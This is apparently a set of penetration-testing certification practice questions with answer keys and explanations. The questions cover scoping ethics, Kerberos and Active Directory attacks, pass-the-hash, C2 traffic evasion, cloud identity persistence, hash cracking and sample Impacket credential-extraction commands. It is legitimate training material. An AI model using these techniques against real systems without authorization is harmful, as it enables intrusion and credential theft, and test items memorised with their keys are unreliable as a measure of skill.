You are the lead penetration tester for an engagement at a regional bank. The client's legal team has approved testing of their external IP range, but the Statement of Work does not mention the third-party core banking platform hosted by a vendor on a shared subnet. During reconnaissance, you discover that one of the client's external IPs routes directly into the vendor's shared environment. What is the MOST appropriate action before conducting any exploitation?

A.Exploit the vulnerability but immediately notify the vendor after obtaining the initial shell to demonstrate impact.
B.Pause testing and obtain written authorization from both the client and the third-party vendor covering the shared environment.
C.Document the finding as informational and skip any testing of that IP, moving on to other in-scope targets.
D.Continue testing because the IP address appears in the client's external range and was approved in the Statement of Work.
AnswerB

The shared subnet belongs to a third party not named in the Statement of Work, so testing it without documented authorization risks violating the engagement's legal boundaries. Getting written permission from both the client and the vendor ensures the Rules of Engagement are expanded lawfully before any exploitation, protecting the tester, the client, and the hosted platform from unauthorized access claims.

Why this answer

Discovering that an in-scope IP routes into a third-party shared environment creates a legal scope conflict. The tester must halt activity on that asset and secure written authorization from both the client and the hosting vendor before any exploitation. This aligns with Rules of Engagement principles that require explicit consent for every tested system, especially third-party infrastructure.

Exam trap

The trap here is assuming that an IP appearing in the client's approved range automatically authorizes testing of whatever infrastructure that IP actually reaches.

183
MCQmedium

During planning, a client requests that you use a specific automated scanner that is known to produce false positives and potential system instability. What is the most professional way to handle this request?

A.Agree to use the tool but run it only during off-peak hours.
B.Refuse the request and insist on using your own proprietary toolset.
C.Document the risks, communicate them to the client, and propose a validated alternative.
D.Use the requested tool but ignore the potential instability issues.
AnswerC

Documenting the risks associated with the tool and proposing a safer alternative demonstrates professional competence. It protects the client from unnecessary downtime while ensuring the assessment quality remains high. This approach fulfills the ethical responsibility to provide the best service while minimizing potential harm to the client's environment.

Why this answer

Professional pentesting requires the expert to validate the tools used against the client's operational constraints. Accepting a tool that causes instability ignores the core principle of 'do no harm'. By explaining the technical risks and proposing a safer, more reliable methodology, the tester acts as a trusted advisor, ensuring the client receives accurate, actionable intelligence without risking their production environment's stability during the process.

Exam trap

Candidates often believe they must blindly obey client requests to use unstable tools, forgetting their professional responsibility to advise against operational risks.

184
MCQmedium

You have obtained domain administrator credentials during a penetration test. To maintain stealthy persistence on a Windows domain controller, you decide to abuse Kerberos. Which method allows you to authenticate as any user without knowing their password, and is a known persistence technique?

A.Golden Ticket attack using the KRBTGT account hash.
B.Silver Ticket attack using a service account hash.
C.Skeleton Key attack by patching LSASS on the domain controller.
D.DCSync attack to replicate domain controller secrets.
AnswerA

A Golden Ticket is forged using the KRBTGT account's NTLM hash to create a TGT that grants access as any user. This provides long-term persistence because the KRBTGT hash remains valid until the password is changed twice. It is a well-known domain escalation and persistence technique.

Why this answer

The Golden Ticket attack is a powerful persistence technique because it allows an attacker with the KRBTGT hash to forge TGTs for any user, including domain admins, without needing their passwords. This access persists until the KRBTGT password is changed twice, making it highly stealthy and long-lasting.

Exam trap

The trap here is confusing DCSync, which extracts hashes, with the Golden Ticket, which uses the extracted KRBTGT hash to forge tickets for persistent access.

185
MCQmedium

You compromise a Windows workstation and extract the NTLM hash of a local administrator account that is reused across many workstations in the domain. You want to authenticate to remote hosts without cracking the hash. Which technique should you use?

A.Use the hash as input to an offline brute-force tool to recover the plaintext password.
B.Kerberoast service accounts to obtain crackable service ticket hashes.
C.Perform a pass-the-hash attack using the extracted NTLM hash to authenticate to remote SMB services.
D.Run a relay attack with Responder to capture and forward NetNTLM authentications.
AnswerC

Pass-the-hash exploits the fact that NTLM authentication accepts the hash itself as proof of identity, so the plaintext password is unnecessary. Tools such as Impacket's psexec or wmiexec accept an LM:NT hash pair and establish an authenticated session. Because the local administrator credential is reused, this yields access to many workstations without cracking the hash.

Why this answer

NTLM authentication treats possession of the hash as sufficient proof of identity, so the extracted local administrator hash can be supplied directly to tools that establish SMB or WMI sessions. Because that local account is reused across workstations, pass-the-hash grants access to many systems immediately, with no cracking step and no dependency on the plaintext password.

Exam trap

The trap here is believing the plaintext password must be recovered before an NTLM hash can be used for authentication.

186
MCQhard

You are conducting a penetration test against a target that employs a next-generation firewall (NGFW) with SSL inspection. Your C2 channel uses a custom protocol over TCP port 8443 with a self-signed certificate. The NGFW is blocking your traffic. You need to modify your C2 configuration to evade detection while maintaining command and control. Which of the following changes is MOST likely to succeed?

A.Switch to using a legitimate code-signing certificate issued by a trusted CA and mimic the TLS fingerprint of a common web browser.
B.Configure the C2 client to use a random port above 1024 and implement jitter in the beacon interval to avoid pattern detection.
C.Use a domain fronting technique with a popular CDN to hide the true destination, and keep the self-signed certificate.
D.Encapsulate the C2 traffic within DNS queries to a domain you control, using a high volume of queries to avoid detection.
AnswerA

SSL inspection decrypts traffic and can block self-signed certificates or anomalous TLS fingerprints. By using a trusted CA certificate and mimicking a browser's TLS fingerprint (e.g., via JA3), the traffic appears legitimate and may bypass inspection. This approach blends with normal HTTPS traffic, making it harder for the NGFW to distinguish malicious C2 from benign web browsing.

Why this answer

The NGFW's SSL inspection is blocking the C2 because it can decrypt the traffic and detect the self-signed certificate or suspicious TLS characteristics. To evade this, the C2 must present a trusted certificate and mimic a legitimate browser's TLS handshake. This makes the traffic indistinguishable from normal HTTPS.

The other options either do not address SSL inspection (jitter, port change) or retain the self-signed certificate (domain fronting), which would still be flagged.

Exam trap

The trap here is focusing on network-level obfuscation like jitter or port changes while ignoring that SSL inspection operates at the application layer and will still detect a self-signed certificate.

187
Multi-Selecthard

When planning an exploit that requires a specific memory address, which THREE techniques can a tester use to increase the reliability of the exploit?

Select 3 answers
A.Heap spraying to fill memory with the payload.
B.Using a large NOP sled before the shellcode.
C.Disabling the target's operating system logging.
D.Employing ROP gadgets to bypass ASLR/DEP.
E.Increasing the network MTU size.
AnswersA, B, D

Heap spraying involves allocating many large chunks of memory containing the shellcode. This increases the probability that the instruction pointer will land on the payload, even if the exact destination address is unknown. It is a powerful technique for overcoming the unpredictability of randomized memory allocation.

Why this answer

Memory reliability is the primary hurdle in binary exploitation. Techniques like heap spraying, NOP sleds, and ROP gadgets are designed to circumvent the uncertainty of memory addresses. By using these methods, a tester creates a more robust exploit that does not rely on perfect, single-point accuracy, which is almost impossible to achieve in modern systems with complex memory management and various active security mitigations.

Exam trap

Candidates often select incorrect options like static DLL injection or standard brute forcing, failing to recognize that NOP sleds, heap spraying, and ROP gadgets directly address memory unpredictability.

188
MCQmedium

During an internal penetration test, you capture an NTLMv2 challenge-response pair using Responder. You want to crack it offline to obtain the user's password. Which Hashcat mode should you use?

A.Mode 3000 (LM)
B.Mode 5500 (NetNTLMv1)
C.Mode 1000 (NTLM)
D.Mode 5600 (NetNTLMv2)
AnswerD

Hashcat mode 5600 is specifically designed for NetNTLMv2 challenge-response pairs, which are captured by tools like Responder. It correctly handles the format including the username, domain, server challenge, and HMAC-MD5 response. Using this mode allows efficient cracking of the captured hash. Other modes correspond to different hash types and would fail to parse the input correctly.

Why this answer

Responder captures NetNTLMv2 challenge-response pairs, which require Hashcat mode 5600 to crack. Mode 5600 correctly parses the username, domain, challenge, and response. Other modes like 5500 (NetNTLMv1), 1000 (NTLM), and 3000 (LM) are for different hash types and would not work.

Selecting the correct mode is essential for successful offline cracking.

Exam trap

The trap here is confusing NetNTLMv2 with raw NTLM hashes or NetNTLMv1, leading to the use of an incorrect Hashcat mode that cannot parse the captured challenge-response pair.

189
Multi-Selecthard

A penetration tester gains Global Administrator privileges in a Microsoft Entra ID tenant and needs to establish persistent access that survives credential resets and standard administrative remediation. Which TWO methods can the tester implement to maintain covert administrative access?

Select 2 answers
A.Creating a new custom user account with an elevated administrative role and a static password that never expires.
B.Registering a new multi-tenant application with Graph API application permissions such as Directory.AccessAsUser.All or RoleManagement.ReadWrite.Directory.
C.Configuring a rogue external federation trust using custom token-signing certificates to forge arbitrary user and administrator identity assertions.
D.Injecting unauthorized security group membership changes directly into the on-premises Active Directory synchronized container.
E.Enabling device registration writeback to push malicious device objects from the cloud directory into local organizational units.
AnswersB, C

Application registrations with high-privilege Microsoft Graph API permissions operate independently of individual user accounts. They allow an external or internal actor to query directory objects, modify roles, and generate fresh access tokens without requiring user logins.

Why this answer

Persistent access in Microsoft Entra ID often relies on abusing application permissions and service principals rather than traditional user accounts. By creating a malicious application registration with high-privilege Microsoft Graph API permissions or injecting a rogue federated domain trust, an attacker ensures long-term access that remains unaffected by standard user password resets or typical admin auditing.

Exam trap

Many candidates mistakenly select user-level persistence techniques like creating shadow user accounts, which are easily flagged by standard Microsoft Entra ID protection alerts and quickly remediated during routine account audits.

190
MCQhard

You are using a C2 framework that supports malleable C2 profiles. Your current profile uses a default HTTP GET beacon with a fixed User-Agent and a URI of /submit.php. The target's network monitoring has flagged this traffic as suspicious. You need to modify the profile to better blend with legitimate traffic. Which of the following changes is the MOST effective for evading network-based detection?

A.Increase the beacon interval to several hours and add large amounts of jitter to make the traffic less frequent and more random.
B.Enable HTTPS with a valid certificate and use a domain that is categorized as 'business' by the firewall's URL filtering.
C.Mimic a legitimate application's traffic pattern by using its specific User-Agent, URI structure, and request headers, and set the beacon interval to match its typical polling frequency.
D.Change the User-Agent to match a common browser and set the URI to a random string for each beacon.
AnswerC

The most effective way to blend in is to fully emulate a legitimate application's communication patterns. This includes not only the User-Agent and URI but also headers, parameter names, and timing. If the C2 traffic matches the application's normal behavior, network monitoring will have difficulty distinguishing it from legitimate traffic. This approach addresses multiple detection vectors simultaneously.

Why this answer

To evade network-based detection, the C2 traffic must closely resemble legitimate traffic. Simply changing the User-Agent or URI is insufficient because the overall pattern may still be anomalous. The most effective approach is to fully emulate a legitimate application, including its headers, URI structure, and timing.

This makes the C2 traffic indistinguishable from the application's normal traffic, bypassing both signature and anomaly-based detection. The other options only partially address the problem.

Exam trap

The trap here is thinking that changing the User-Agent or URI is enough, but modern detection systems baseline application behavior and will flag random or inconsistent patterns.

191
MCQmedium

Why is it important to use 'staged' payloads during a penetration test when the target has limited memory or strict filtering?

A.To bypass the system's firewall rules permanently.
B.To fit within small buffer constraints during initial exploitation.
C.To automatically upgrade the shell to root privileges.
D.To increase the target's CPU usage for testing stability.
AnswerB

Many vulnerabilities, such as stack-based buffer overflows, have limited space for shellcode. A staged payload uses a small 'stager' to initiate the connection and pull down the 'stage' (the full payload), allowing the exploit to succeed even when the available memory for shellcode injection is very small.

Why this answer

Staged payloads are split into a small initial stub and a larger secondary component. The small stub fits into tight buffer constraints or bypasses initial inspection, then downloads the rest of the shellcode. This is crucial for environments with limited memory or security products that block large, anomalous network traffic, as it allows for stealthy, efficient exploitation where a full-sized monolithic payload would fail or trigger an alarm.

Exam trap

Candidates often think staged payloads are chosen strictly for stealth against antivirus, overlooking their crucial role in overcoming strict buffer size limitations during initial exploitation.

192
MCQmedium

During an internal penetration test, you have obtained cleartext credentials for a low-privileged Active Directory user. You want to enumerate which user accounts do not require Kerberos preauthentication so you can request AS-REP messages and crack them offline. Which Impacket tool and command should you use?

A.ticketer.py -nthash <hash> -domain domain.local -dc-ip 10.0.0.1 user
B.GetNPUsers.py -request -dc-ip 10.0.0.1 domain/user:password
C.GetUserSPNs.py -request -dc-ip 10.0.0.1 domain/user:password
D.secretsdump.py domain/user:password@10.0.0.1
AnswerB

GetNPUsers.py is the Impacket tool specifically built for AS-REP Roasting. With the -request flag, it queries Active Directory for accounts where the 'Do not require Kerberos preauthentication' flag is set, then sends an AS-REQ for each and captures the returned AS-REP, which is encrypted with the user's password hash. This aligns exactly with your goal of enumerating and extracting crackable AS-REP messages.

Why this answer

AS-REP Roasting targets accounts that have Kerberos preauthentication disabled. The Impacket script GetNPUsers.py with the -request flag queries the domain for such accounts and requests an AS-REP for each, which can then be cracked offline. The other tools serve different purposes: GetUserSPNs.py is for Kerberoasting, secretsdump.py extracts secrets from hosts, and ticketer.py forges tickets.

Exam trap

The trap here is confusing AS-REP Roasting with Kerberoasting; both involve requesting encrypted tickets for offline cracking, but they target different account configurations and use different Impacket scripts.

193
MCQhard

During a penetration test, you have established a C2 channel using a domain fronting technique with a CDN. The target organization's proxy logs show connections to a high-reputation domain, but the actual C2 traffic is destined for your backend server. Which component is essential for this setup to function?

A.An HTTP redirect from the high-reputation domain to your backend server.
B.A DNS TXT record pointing to your backend server.
C.A CDN that supports domain fronting and allows you to configure the Host header separately from the SNI.
D.A valid SSL certificate for the high-reputation domain on your backend server.
AnswerC

Domain fronting relies on the CDN accepting a Host header that differs from the SNI. The CDN routes based on the Host header to your backend, while the SNI shows a high-reputation domain. This requires CDN support for domain fronting, which some providers have disabled. Without this, the technique fails. Thus, this component is essential.

Why this answer

Domain fronting requires a CDN that permits the Host header to differ from the SNI. The CDN uses the Host header to route to the correct backend, while the SNI shows a trusted domain. This makes the traffic appear to go to a high-reputation domain.

Without CDN support, the technique cannot work. Other options are either handled by the CDN or irrelevant to the mechanism.

Exam trap

The trap here is assuming that the backend server needs a certificate for the fronted domain, but the CDN terminates TLS and presents its own certificate.

194
Multi-Selectmedium

A penetration tester is reviewing Active Directory for Kerberos delegation misconfigurations that could allow privilege escalation. Which of the following TWO configurations should the tester flag as directly enabling an attacker to impersonate a domain administrator to a target service? (Choose two.)

Select 2 answers
A.A standard user account with the 'Account is sensitive and cannot be delegated' flag set.
B.A user account configured for constrained delegation with the 'Use any authentication protocol' option and msDS-AllowedToDelegateTo set to a sensitive service.
C.A group Managed Service Account (gMSA) with a 120-character automatically rotated password.
D.A domain controller configured with the 'Trusted for Delegation' flag but no users currently logged on.
E.A computer account configured for unconstrained delegation where a domain administrator has authenticated.
AnswersB, E

Constrained delegation with protocol transition allows the service to obtain a forwardable ticket to any listed service on behalf of any user, without that user authenticating. If the allowed service is sensitive, an attacker controlling the account can impersonate a domain administrator to that service, achieving escalation.

Why this answer

Unconstrained delegation caches TGTs of authenticating users, so a domain administrator's logon on such a host exposes their TGT for impersonation. Constrained delegation with protocol transition and a sensitive target allows an attacker controlling the delegating account to impersonate any user, including administrators, to that service. Both configurations directly enable the described escalation and should be flagged.

Exam trap

The trap here is treating any delegation flag as exploitable, when only specific combinations like unconstrained delegation with a privileged logon or constrained delegation with protocol transition to a sensitive service actually enable impersonation.

195
MCQhard

A penetration tester is using Nmap to scan a target subnet and wants to identify all hosts that are up without performing port scanning. The tester also wants to avoid sending TCP SYN packets to reduce noise. Which Nmap option should the tester use?

A.-sS
B.-sn
C.-sP
D.-Pn
AnswerB

The -sn option performs a ping scan (host discovery) without port scanning. It sends ICMP echo requests, TCP SYN to port 443, TCP ACK to port 80, and ICMP timestamp requests by default, but it does not perform a full port scan. This meets the requirement to identify live hosts without port scanning, though it may still send some TCP packets depending on the target's response.

Why this answer

The -sn option is designed for host discovery only, performing a ping scan without port scanning. It sends various probes to determine if hosts are up, but does not scan ports, thus reducing noise from TCP SYN packets to ports. Other options either perform port scanning, are deprecated, or skip discovery entirely, making them unsuitable for the scenario.

Exam trap

The trap here is confusing -sn with -Pn or -sS; -sn does host discovery without port scanning, while -Pn skips discovery and scans ports, and -sS is a port scan itself.

196
MCQmedium

Which command in the Metasploit Framework allows a user to interact with a backgrounded session after a successful exploit execution?

A.exploit -j
B.sessions -i
C.run -s
D.use -session
AnswerB

The sessions command with the -i flag followed by the ID number is the standard syntax for interacting with a specific established Meterpreter session. It transfers the console's input/output to the remote system, allowing the tester to execute commands directly on the target machine with the payload's privileges.

Why this answer

The 'sessions' command is the primary method for managing active connections within Metasploit. Once an exploit establishes a payload, the session moves to the background. Using 'sessions -i <id>' connects the user to the specific meterpreter shell, enabling post-exploitation activities.

This is crucial for maintaining persistence and executing lateral movement tasks in a penetration test, as it allows the operator to toggle between multiple compromised targets effectively.

Exam trap

Candidates often confuse the 'sessions -i' command with 'exploit' or 'connect', mistakenly believing that they need to re-run the exploit to regain access to a backgrounded session.

197
MCQmedium

A tester has compromised a Windows host and wants to use Metasploit to harvest credentials from memory without uploading additional tools. Which Metasploit post-exploitation module should be used to extract password hashes from the LSASS process?

A.post/windows/gather/smart_hashdump
B.post/windows/gather/credentials/mimikatz
C.post/windows/gather/hashdump
D.post/windows/gather/credentials/credential_collector
AnswerB

The mimikatz module in Metasploit uses the Mimikatz tool to extract credentials from LSASS memory, including plaintext passwords, hashes, and Kerberos tickets. It runs in memory without uploading additional tools, directly satisfying the requirement to harvest credentials from memory on the compromised Windows host.

Why this answer

To extract credentials from LSASS memory, the Mimikatz-based post module is the appropriate choice. It interacts with LSASS to retrieve plaintext passwords, NTLM hashes, and Kerberos tickets. Other modules like hashdump and smart_hashdump target the SAM database or NTDS.dit, and credential_collector gathers from registry and files, so they do not meet the specific requirement of memory credential harvesting.

Exam trap

The trap here is assuming hashdump or smart_hashdump extracts credentials from LSASS memory, when they primarily target the SAM database.

198
MCQmedium

Refer to the exhibit. What is the primary purpose of the 'jitter' parameter in this C2 configuration?

A.To reduce the CPU overhead on the infected host.
B.To synchronize beaconing across multiple infected hosts.
C.To prevent detection via traffic pattern analysis.
D.To increase the throughput of the C2 channel.
AnswerC

Traffic pattern analysis identifies beacons by looking for regular, periodic intervals. By adding 20% jitter to a 60-second interval, the check-in occurs between 48 and 72 seconds. This variation breaks the statistical regularity, making it much harder to distinguish from legitimate user-initiated web browsing activity.

Why this answer

The jitter parameter introduces a random percentage of variation into the beacon interval, preventing the C2 traffic from appearing as a perfectly rhythmic heartbeat. Static intervals are highly detectable through statistical analysis, as they create distinct patterns in network traffic logs. Introducing jitter makes the C2 communication appear more organic and unpredictable, complicating efforts by defenders to identify the malicious connection using simple frequency-based anomaly detection algorithms.

Exam trap

Examinees often guess that jitter is used to speed up data exfiltration or evade simple port blocking, confusing timing randomization with protocol obfuscation methods.

199
MCQmedium

What is the primary danger of leaving a 'backdoor' account on a compromised system after a penetration test?

A.The account may trigger an automated system update.
B.The account acts as a persistent entry point for unauthorized parties.
C.The system performance will degrade due to the account.
D.The account automatically encrypts data in the directory.
AnswerB

A backdoor account provides a known credential or access method that an attacker can use to return to the system. If this is not removed, it remains a permanent security hole that can be exploited long after the legitimate testing window has closed, causing significant risk to the organization.

Why this answer

Leaving a backdoor account creates an unauthorized access path that persists after the engagement ends. This violates the principle of 'cleanup' and can lead to security breaches by third parties who discover the account. It represents a significant liability and risk for the client, as an unsecured backdoor account is a prime target for malicious actors looking to exploit the environment without further effort.

Exam trap

Candidates often focus on the technical 'how' of the backdoor. They overlook the professional and ethical imperative of cleanup, which is critical for avoiding long-term security liabilities for clients.

200
MCQmedium

Refer to the exhibit. During an Azure engagement, you query a service principal via the Microsoft Graph API and notice that 'appRoleAssignmentRequired' is set to 'false'. What security implication does this setting present for enterprise applications?

A.Only users explicitly assigned via Azure AD Enterprise Applications can authenticate and access the application.
B.Any user in the Azure AD tenant can authenticate to the application and obtain access tokens without prior assignment.
C.The application is prohibited from utilizing OAuth 2.0 authorization code flows and must rely exclusively on client credentials.
D.Global administrators must manually approve every single sign-in attempt generated by standard users in the tenant.
AnswerB

Setting this property to false bypasses the user assignment requirement entirely. This default setting means every member of the directory is authorized to log in, which can be dangerous if the application contains sensitive internal functionality.

Why this answer

The 'appRoleAssignmentRequired' property dictates whether users must be explicitly assigned to an enterprise application before they can successfully authenticate. When set to false, any user within the directory can acquire tokens for the application, expanding the attack surface and potential exposure.

Exam trap

Candidates often assume that setting 'appRoleAssignmentRequired' to false restricts access to administrators only, when in reality it opens access to all tenant users.

201
MCQmedium

A penetration tester extracts a password hash from a compromised Linux system. The hash format is `$6$rounds=5000$abcdefgh$...`. Which hashing algorithm and configuration does this represent?

A.SHA-256 crypt with 5000 rounds and salt 'abcdefgh'
B.MD5 crypt with 5000 rounds and salt 'abcdefgh'
C.bcrypt with cost factor 5000 and salt 'abcdefgh'
D.SHA-512 crypt with 5000 rounds and salt 'abcdefgh'
AnswerD

The prefix `$6$` denotes SHA-512 crypt, the `rounds=5000` parameter specifies the number of iterations, and `abcdefgh` is the salt. This is a common format in /etc/shadow on modern Linux systems. The tester must use a tool that supports SHA-512 crypt, such as Hashcat mode 1800 or John the Ripper with the crypt format.

Why this answer

The hash begins with `$6$`, which is the standard identifier for SHA-512 crypt. The `rounds=5000` indicates the iteration count, and the following string is the salt. This format is widely used on Linux systems for password storage.

A penetration tester must recognize the prefix to select the correct cracking mode, such as Hashcat mode 1800, and configure the tool accordingly to attempt recovery.

Exam trap

The trap here is assuming that a numeric parameter like 5000 always refers to a cost factor rather than an iteration count, which can lead to using the wrong cracking tool settings.

202
MCQmedium

Why do many C2 frameworks include a 'sleep' command that can be configured by the operator?

A.To allow the malware to clear its memory footprint.
B.To minimize the visibility of the C2 beacon.
C.To bypass the need for a persistent connection.
D.To prevent the target from shutting down the system.
AnswerB

High-frequency beaconing is a very loud indicator of compromise. By increasing the sleep interval, an operator can make the beaconing activity appear much less frequent, significantly reducing the probability of detection by behavioral analysis tools that look for rapid, repeated connections to an external command server.

Why this answer

The 'sleep' command allows an operator to control the frequency of beaconing manually. This is useful for balancing the need for responsiveness with the need for stealth. By increasing the sleep time, the operator makes the beacon less frequent, which reduces the chance of detection by network anomaly systems.

This flexibility is a core feature of modern C2 suites, enabling operators to manage the trade-off between active engagement and operational security.

Exam trap

Candidates frequently assume the sleep command is designed to reduce CPU utilization on the compromised host, rather than lowering network traffic visibility.

203
MCQmedium

What is the primary security benefit of implementing Group Managed Service Accounts (gMSAs) in an environment vulnerable to Kerberoasting?

A.gMSAs prevent the KDC from issuing service tickets for the account.
B.gMSAs require multi-factor authentication for every TGS-REQ performed.
C.gMSAs use long, complex passwords that are automatically rotated by the domain controller.
D.gMSAs force all Kerberos traffic to be encrypted using AES-256 only.
AnswerC

The core security advantage of gMSAs is the management of long, high-entropy passwords that are rotated automatically. By removing the need for manual password management, gMSAs eliminate the risk of weak, static passwords that are easily brute-forced offline after a Kerberoasting ticket capture.

Why this answer

gMSAs are designed to mitigate the risks associated with long-term static service account passwords. They feature automatically managed, complex passwords that are rotated frequently by the Active Directory domain controller. Because the passwords are long and changed regularly, they are effectively impossible to crack offline even if an attacker successfully captures the encrypted TGS ticket during a Kerberoasting attempt, rendering the attack functionally useless.

Exam trap

Students often believe gMSAs are meant to prevent all Active Directory attacks, overlooking that their specific security benefit is the automatic rotation of complex passwords to defeat offline cracking.

204
MCQmedium

Which file in a Windows system is required, along with the NTDS.dit file, to decrypt cached credentials stored in the database?

A.SAM hive
B.SOFTWARE hive
C.SYSTEM hive
D.SECURITY hive
AnswerC

The SYSTEM hive contains the Boot Key (also known as the Syskey). This key is used to encrypt the database of Active Directory, NTDS.dit. Without this specific key, the hashes within the NTDS.dit file remain unreadable, making it impossible to perform any meaningful offline analysis of domain credentials.

Why this answer

The NTDS.dit file is the primary database for Active Directory, but it is encrypted. The encryption key, known as the boot key, is stored in the SYSTEM registry hive. Without access to the SYSTEM hive, the NTDS.dit file is useless for offline credential extraction.

This relationship underscores the need for testers to obtain both files during a post-exploitation phase to achieve successful credential recovery.

Exam trap

Candidates often suggest the SAM file is required. While the SAM file is used for local credential extraction, the SYSTEM hive is specifically required to decrypt the NTDS.dit database for domain-level credentials.

205
MCQmedium

What is the primary function of 'rules' in tools like Hashcat when performing a dictionary attack?

A.To decrypt the hash using the specified algorithm.
B.To transform dictionary words into common password variations.
C.To automatically update the hashing algorithm to a newer standard.
D.To bypass account lockout mechanisms on the target system.
AnswerB

Rules allow for the programmatic mutation of wordlist entries. By applying rules such as appending numbers, capitalizing, or substituting characters, testers can simulate common user password patterns. This dramatically improves success rates against users who follow simple patterns to satisfy organizational password complexity policies during the cracking process.

Why this answer

Rules are used to transform wordlist entries into variations. For example, a rule might take the word 'password' and generate 'Password123!' or 'P@ssw0rd'. This increases the effectiveness of dictionary attacks by covering common variations that users employ to meet complexity requirements, without needing a massive, exhaustive dictionary.

This is a critical skill for testers to maximize the utility of limited wordlist sizes while increasing the likelihood of cracking complex, user-chosen passwords.

Exam trap

Many candidates think rules are used to generate completely random passwords, missing their actual purpose of modifying existing dictionary words.

206
MCQhard

During a penetration test for a multinational retailer, you discover that a legacy internal application in scope contains a hardcoded credential that also grants access to a payment processing system the client explicitly excluded from testing. You have not yet used the credential. What is the MOST appropriate course of action?

A.Report the hardcoded credential as an informational finding without mentioning the link to the excluded payment system.
B.Continue testing other in-scope systems and include the credential finding in the final report at the end of the engagement.
C.Use the credential only to confirm it works against the excluded system, then report the finding without making changes.
D.Immediately notify the client's designated point of contact, document the finding, and await written guidance before accessing the excluded system.
AnswerD

The credential crosses into an explicitly excluded system, so any use would violate the Rules of Engagement. Notifying the client contact, documenting the finding, and pausing until written guidance arrives preserves the scope boundary while still surfacing a serious risk. This protects the tester legally and gives the client control over how the sensitive payment system is handled.

Why this answer

When testing reveals a path into an explicitly excluded system, the tester must stop and escalate rather than proceed. Notifying the client contact, documenting the discovery, and awaiting written direction respects the Rules of Engagement while ensuring the client can act on a serious risk. This balances the obligation to report critical findings with the legal boundary the client set.

Exam trap

The trap here is believing that a brief, read-only authentication attempt against an excluded system is acceptable because it confirms impact without changing data.

207
MCQmedium

During a penetration test of a Microsoft Entra ID environment, you discover that an on-premises user account has the ms-DS-ConsistencyGuid attribute set to a value that matches the ImmutableID of a cloud user with higher privileges. What is the most likely security implication of this configuration?

A.It allows the on-premises user to reset the privileged user's password.
B.It enables password hash synchronization for the privileged user.
C.It causes a synchronization error that prevents the user from logging in.
D.It allows the on-premises user to authenticate to the cloud as the privileged user.
AnswerD

The ms-DS-ConsistencyGuid is used as the source anchor for synchronization. If it matches the ImmutableID of a privileged cloud user, the on-premises user will be linked to that cloud account during synchronization, effectively allowing the on-premises user to take over the cloud identity and authenticate as the privileged user. This is a severe privilege escalation vulnerability.

Why this answer

The ms-DS-ConsistencyGuid attribute is used as the source anchor when Microsoft Entra Connect is configured to use it. If an attacker can modify this attribute on an on-premises user to match the ImmutableID of a privileged cloud user, the next synchronization will link the on-premises account to the cloud account. The attacker can then authenticate to the cloud as the privileged user, achieving privilege escalation.

Exam trap

The trap here is assuming that the ms-DS-ConsistencyGuid is just a random identifier and not recognizing its role as the source anchor that can be manipulated to link accounts.

208
MCQhard

Which THREE conditions must be met for a successful AS-REP Roasting attack?

A.The account must have the 'Do not require Kerberos pre-authentication' flag set.
B.The attacker must have Domain Admin credentials.
C.The attacker must have a valid username in the domain.
D.The service account must have AES-256 encryption enabled.
E.The attacker must be able to communicate with the domain's KDC.
AnswerA, C, E

This is the core requirement for the attack. Normally, Kerberos requires pre-authentication to prevent offline cracking. If this flag is enabled, the KDC will provide the encrypted data without requiring the user to prove they know their password, allowing the attacker to capture the data for offline cracking.

Why this answer

AS-REP Roasting targets accounts configured with the 'Do not require Kerberos pre-authentication' flag. This vulnerability allows an attacker to request a TGT without providing the user's password. The KDC responds with an encrypted structure that can be cracked offline.

Understanding this process is vital for identifying misconfigured service accounts that provide a low-hanging fruit for attackers to gain credentials without triggering common alerts.

Exam trap

Candidates frequently forget that the attacker needs a valid domain username to request the AS-REP. They incorrectly assume the attack can be performed blindly against any arbitrary username in the domain.

209
Multi-Selectmedium

When defining the 'Scope' for a penetration test, which THREE factors are critical to document to ensure the engagement is legally and operationally sound?

Select 3 answers
A.The exact IP ranges and subnets authorized for testing.
B.The personal email addresses of the IT administrators.
C.A list of specific exclusions or off-limits systems.
D.The specific business-critical assets to prioritize.
E.The specific passwords used for internal testing accounts.
AnswersA, C, D

Defining the exact IP ranges and subnets is fundamental to ensuring that the testing team does not accidentally scan or exploit systems that are not part of the agreement. This provides a clear boundary for the assessment and prevents unauthorized access to protected or third-party infrastructure.

Why this answer

Defining the scope accurately is the most important part of the planning phase. It prevents 'scope creep', protects the tester from claims of unauthorized access, and ensures the testing effort is focused on the most critical assets. By clearly documenting IP ranges, business-critical systems, and exclusions, the tester ensures that the activity remains within the agreed-upon boundaries and that both parties agree on what is being assessed and protected.

Exam trap

Candidates often forget that defining exclusions and high-priority business assets are just as vital to a legally sound scope as listing IP ranges.

210
MCQmedium

Refer to the exhibit. Which step should a tester prioritize next based on the server header information?

A.Run a brute-force password attack against the server.
B.Search for known vulnerabilities for Apache 2.4.41.
C.Immediately deploy a rootkit on the server.
D.Close the connection and report the server as secure.
AnswerB

Identifying the service and version is a prerequisite for vulnerability research. By mapping this version to known security advisories or CVE databases, a tester can determine if public exploits exist for this specific configuration, effectively narrowing the attack surface to the most likely points of failure.

Why this answer

The server header indicates a specific version of Apache running on Ubuntu. A tester should cross-reference this version with known vulnerabilities, such as CVEs in the Apache HTTP Server. This is a foundational step in identifying applicable exploits.

Knowing the specific version allows for targeted research into public or private exploit modules, increasing the probability of a successful engagement by focusing on documented, verifiable weaknesses within that specific software build.

Exam trap

Testers often attempt to brute-force or perform manual discovery before checking for known CVEs, wasting time on manual enumeration when a simple version-based exploit search would suffice.

211
MCQmedium

An attacker is performing reconnaissance on an Azure AD tenant and notices that 'Guest' users can enumerate the directory. Which specific setting should be checked to remediate this?

A.External collaboration settings for Guest user access restrictions.
B.Conditional Access policy for guest users.
C.The 'Enable Global Reader' role for guests.
D.The 'AppRoleAssignmentRequired' property of the tenant.
AnswerA

This setting in the Azure AD 'External Identities' configuration explicitly controls the visibility of guest users. By setting this to 'Limited access', guests can only see their own profile, which prevents them from enumerating other users, groups, or sensitive directory information.

Why this answer

By default, Azure AD allows guest users to see other users and groups in the directory. This is a common reconnaissance vector for attackers to map the organization's structure. Restricting this access is a critical step in hardening the tenant, ensuring that guest identities have limited visibility into the internal organizational structure during an initial compromise.

Exam trap

Candidates frequently look for 'Conditional Access' policies or 'Role-Based Access Control' settings. They miss the specific 'External collaboration settings' menu, which controls global directory visibility for guest users.

212
MCQmedium

You are conducting an internal penetration test and have obtained a set of NTLM hashes from a compromised server. You want to crack them using Hashcat on a dedicated GPU rig. Which hash mode should you use?

A.Hashcat mode 1800 (sha512crypt)
B.Hashcat mode 13100 (Kerberos 5 TGS-REP)
C.Hashcat mode 1000 (NTLM)
